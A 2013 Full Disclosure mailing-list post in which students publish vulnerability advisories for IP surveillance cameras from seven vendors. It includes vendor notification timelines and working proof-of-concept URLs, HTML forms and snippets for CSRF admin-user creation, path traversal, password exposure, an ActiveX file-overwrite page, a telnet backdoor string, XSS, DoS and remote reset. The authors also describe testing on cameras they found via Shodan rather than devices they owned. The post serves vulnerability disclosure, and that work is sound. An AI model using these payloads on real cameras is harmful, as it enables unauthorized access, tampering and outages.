Full Disclosure mailing list archives
Security Analysis of IP video surveillance cameras
From: Javier Repiso Sánchez <javier.repiso () hotmail com>
Date: Wed, 12 Jun 2013 10:19:16 +0200
Dear sirs, We are a group of students from the European University of Madrid who have made a security analysis of IP video surveillance cameras as the final project of Security and Information Technology Master. In total, we analyzed 9 different camera brands and we have found 14 vulnerabilities.
From these vulnerabilities, there are all kinds: simple vulnerabilities, such as XSS or CRSF, and very harmful and dangerous vulnerabilities such as privilege escalation or bypass authentication.
**Note that all the analysis we have done has been from cameras found through Google dorks and Shodan, so we have not needed to purchase any of them for our tests. Everything we needed was online. In conclusion we can say that the vast majority of security cameras are not ready to connect to an open network where everyone can get to access them. We proceed to describe all previously reported vulnerabilities order by brands: =========================================================================== AIRLIVE ==================================================================== =========================================================================== 1.Advisory Information Title: Airlive Multiple Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description Multiple vulnerabilities have been found in this devices: -CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103) -CVE-2013-3541. Relative Path Traversal(CWE-23). -CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264) -CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3691. Denial of Service 3.Affected Products CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD. It’s possible others models are affected but they were not checked. 4.PoC 4.1.Cross Site Request Forgery (CSRF) CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator. These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. In the following example we will make a vector to create an alternative user with administration credentials. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect= _____________________________________________________________________________ 4.2.Relative Path Traversal CVE-2013-3541, Transversal Path that’s allow you to read file system configuration. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd _____________________________________________________________________________ 4.3.Sensitive Information Exposure + Privilege Escalation CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID _____________________________________________________________________________ We can decode Admin password (base64). Now we can relogin like admin user and we have made the escalation privilege 4.4.Clear Text Storage of Sensitive Information CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file. You can open with any text editor and look for user's information for example, passwords, users and so on. 4.5.Denial of Service (DoS) Use CVE-2013-3691, DoS by overbuffing path ‘/’. A request with a large number of ‘a’ can take down the http service from the camera device. _____________________________________________________________________________ Request: http://xx.xx.xx.xx/[a*3000] _____________________________________________________________________________ You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won’t recuperate ever itself The following Python script could be used to test the DoS: _____________________________________________________________________________ @ request = 'GET /' + ‘A’ * 3000 + '.html HTTP/1.0\r\n' @ s = socket.socket() @ s.connect((cam_ip, 80)) @ s.send(request) @ response = s.recv(1024) @ s.close() _____________________________________________________________________________ 5.Credits -CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo. -CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo -CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jonás Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received. -2013-06-03: Students asks for a reply. -2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities. ======================================================================== AXIS ==================================================================== ======================================================================== 1.Advisory Information Title: AXIS Media Control ActiveX vulnerability Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description A vulnerability has been found in this devices: -CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618) 3.Affected Products CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected The vulnerability affects to the latest version of the software (6.2.10.11 which was released on October 19, 2012) 4.PoC 4.1.Exposed Unsafe ActiveX Method - File Corruption. In the vendor web, you could see that “AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer.” Vulnerability which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system. The vulnerability exists due to the ActiveX control including insecure "StartRecord()", "SaveCurrentImage()" and "StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user. In the following example we will corrupt regedit.exe using one of ActiveX vulnerable methods: When we click on one of the buttons, we could see that regedit.exe is overwritten with garbage: The following code could be used to test the vulnerability: _____________________________________________________________________________ <html> <head> <title></title> <script language="javaScript" type="text/javascript"> function startRecord(){ var theFile = "FilePath//File_name_to_corrupt_or_create"; MyActiveX.StartRecord(theFile); } function saveCurrentImage(){ var theFile = "FilePath//File_name_to_corrupt_or_create"; var theFormat = 1; MyActiveX.SaveCurrentImage(theFormat, theFile); } function startRecordMedia(){ var theFile = "FilePath//File_name_to_corrupt_or_create"; var theFlags = 1; var theMediaTypes = "default" MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes); } </script> </head> <body> <object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480"> <param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg"> <param name="MediaType" value="mjpeg"> <param name="Volume" value="1"> <param name="ShowStatusBar" value="1"> <param name="ShowToolbar" value="1"> <param name="AutoStart" value="1"> <param name="UIMode" value="ptz-relative"> <param name="MediaType" value="mjpeg-unicast"> <param name="StretchToFit" value="0"> < param name ='PTZControlURL' value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi> </object> <br> <INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()"> <INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()"> <INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()"> </body> </html> _____________________________________________________________________________ 5.Credits -CVE-2013-3543 was discovered by Javier Repiso Sánchez. 6.Report Timeline -2013-05-24: Students team notifies the Axis Customer Support of the vulnerability -2013-05-24: Axis team asks for a report with technical information. -2013-05-26: Technical details sent to Axis. -2013-05-27: Axis team reports to the technical support to analyze the vulnerability. ============================================================================ BRICKCOM ==================================================================== ============================================================================ 1.Advisory Information Title: Brickcom 100ap Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description Multiples vulnerabilities have been found in this device. -CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250) 3.Affected Products The following products are affected by these vulnerabilities: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E It’s possible others models are affected but they were not checked. -CVE-2013-3689. We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1 In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4 -CVE-2013-3690. All firmware checked. 4.PoC 4.1.Authentication Bypass & Clear Text Storage of Sensitive Information CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It’s not necessary any authentication. _____________________________________________________________________________ http://xx.xx.xx.xx/configfile.dump?action=get _____________________________________________________________________________ The most interesting parameters could be: UserSetSetting.userList.users[nº].password= *** UserSetSetting.userList.users[nº].name= *** 4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation CVE-2013-3690, CSRF is possible via POST method. Also is possible a privilege escalation from a viewer user to an administrator user. These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. The following request can exploit this vulnerability _____________________________________________________________________________ <html> <body> <form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST"> <input type="hidden" name="action" value="add"> <input type="hidden" name="index" value="0"> <input type="hidden" name="username" value="test2"> <input type="hidden" name="password" value="test2"> <input type="hidden" name="privilege" value="1"> <script>document.gobap.submit();</script> </form> </body> </html> _____________________________________________________________________________ 5.Credits -CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo. -CVE-2013-3690 was discovered by Jonás Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. -2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct. (CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it’s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one) -2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities. -2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible. =============================================================================== GRANDSTREAM ==================================================================== =============================================================================== 1.Advisory Information Title: Grandstream Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description The following vulnerability has been found in these devices: -CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443) -CVE-2013-3962. Cross Site Scripting(CWE-79) -CVE-2013-3963. Cross Site Request Forgery(CWE-352) and Clickjacking(Capec-103) 3.Affected Products The following product are affected: GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD and GXV3500. -CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963. It’s possible others models are affected but they were not checked. 4.PoC 4.1.Backdoor in Telnet Protocol CVE-2013-3542, Backdoor in Telnet Protocol You should connect via telnet protocol to any camera affected (it's open by default). After all you should be introduce the magic string “ !#/ ” as Username and as Password. You will get the admin panel setting menu. If you type "help", the following commands are shown: ======================================================= help, quit, status, restart, restore, upgrade, tty_test ======================================================= @@@ restore (Reset settings to factory default) The attacker can take the device control, so it's make this devices very vulnerables. 4.2.Cross Site Scripting (XSS) CVE-2013-3962, Cross Site Scripting non-persistent. _____________________________________________________________________________ http://xx.xx.xx.xx/<script>alert(123)</script> _____________________________________________________________________________ 4.3.Cross Site Request Forgery (CSRF) CVE-2013-3963, CSRF via GET method. These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. You should introduce the following URL to replicate the attack. _____________________________________________________________________________ http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0 _____________________________________________________________________________ 5.Credits -CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jonás Ropero Castillo. 6.Report Timeline -2013-05-31: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3542. -2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability. -2013-06-11: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities. =========================================================================== SAMSUNG ==================================================================== =========================================================================== 1.Advisory Information Title: Samsung Series Vulnerability Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description The following vulnerability has been found in these devices: -CVE-2013-3964. Cross Site Scripting(CWE-79) 3.Affected Products CVE-2013-3964, the following product are affected: SHR-5162, SHR-5082 It’s possible others models are affected but they were not checked: SHR-5XXX,SHR-516X,SHR-508X,SHR-5042,SHR-4160,SHR-4081,SHR-2XXX,SHR-216X,SHR-208X,SHR-204X 4.PoC 4.1.Cross Site Scripting (XSS) CVE-2013-3964, Cross Site Scripting non-persistent. _____________________________________________________________________________ http://xx.xx.xx.xx/<script>alert(123)</script> _____________________________________________________________________________ 5.Credits CVE-2013-3964 ,was discovered by Jonás Ropero Castillo. 6.Report Timeline -2013-06-11: Students try to contact to Samsung Support Centre, but the service is temporarily down. =========================================================================== SONY ==================================================================== =========================================================================== 1.Advisory Information Title: Sony CH, DH Series Vulnerability Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description We have been found the next vulnerability in this devices -CVE-2013-3539. Cross Site Request Forgery(CWE-352) 3.Affected Products CVE-2013-3539, the following product are affected SNC CH140, SNC CH180, SNC CH240, SNC CH280, SNC DH140, SNC DH140T, SNC DH180, SNC DH240, SNC DH240T and SNC DH280. It’s possible others models are affected but they were not checked. 4.PoC 4.1.Cross Site Request Forgery (CSRF) CVE-2013-3539, CSRF via POST method. Targeted attack to any administrator. These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. This is our .html attack. _____________________________________________________________________________ <html> <body> <form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST"> <input type="Select" name="ViewerModeDefault" value="00000fff"> <input type="Hidden" name="ViewerAuthen" value="off"> <input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4="> <input type="Hidden" name="User1" value="xxxx,c0000fff"> <input type="Hidden" name="User2" value="xxxx,c0000fff"> <input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff"> <input type="Hidden" name="User4" value="Og==,00000fff"> <input type="Hidden" name="User5" value="Og==,00000fff"> <input type="Hidden" name="User6" value="Og==,00000fff"> <input type="Hidden" name="User7" value="Og==,00000fff"> <input type="Hidden" name="User8" value="Og==,00000fff"> <input type="Hidden" name="User9" value="Og==,00000fff"> <input type="Hidden" name="Reload" value="referer"> <script>document.SonyCsRf.submit();</script> </form> </body> </html> _____________________________________________________________________________ Now we can check that we have a new user in the configuration. 5.Credits CVE-2013-3539 was discovered by Jonás Ropero Castillo. . 6.Report Timeline -2013-05-25: Students team notifies the Sony Customer Support of the vulnerability. No reply received. =========================================================================== TP-LINK ==================================================================== =========================================================================== 1.Advisory Information Title: TP-LINK TL-SC3171 Vulnerability Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description The next vulnerability has been found in this device: -CVE-2013-3688. Authentication Bypass Issues(CWE-592) and Execution with Unnecessary Privileges(CWE-250). 3.Affected Products -CVE-2013-3688. The following product are affected: TP-LINK TL-SC3171 It’s possible others models are affected but they were not checked. 4.PoC 4.1.Execute Remote Command bypassing authentication CVE-2013-3688, Execute Remote Command bypassing authentication. We have found that is possible to reboot this kind of devices remotely. The attack vector is the following one: _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/reboot http://xx.xx.xx.xx/cgi-bin/hardfactorydefault _____________________________________________________________________________ In the first one you will get blank page and you can’t re-login until the device is reboot. In the second one, you will get a victory message and of course, in the next login you should introduce factory settings. 5.Credits -CVE-2013-3688, was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the TP-Link Customer Support of the vulnerability. No reply received. -2013-06-03: Students asks for a reply. -2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability before and this has been corrected in a new beta firmware version. -2013-06-04: Students answer to the vendor saying that this vulnerability is different from the Coresecurity vulnerabilities. -2013-06-05: TP-Link answers saying this vulnerability is the same as the vulnerability reported by Coresecurity. -2013-06-05: Students respond by explaining the details of the vulnerability and confirming that the vulnerability is different. -2013-06-06: TP-Link answer confirming that the vulnerability is fixed with the latest patch for the reported vulnerabilities generated by Coresecurity. The beta version is available on the website of TP-Link AUTHORS Eliezer Varadé Lopez Javier Repiso Sánchez Jonás Ropero Castillo
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Security Analysis of IP video surveillance cameras Javier Repiso Sánchez (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Leif Nixon (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Andrew Smith (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Paul Ammann (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Marcos Agüero (Jun 13)
- Re: Security Analysis of IP video surveillance cameras Vitor Ventura (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Leif Nixon (Jun 12)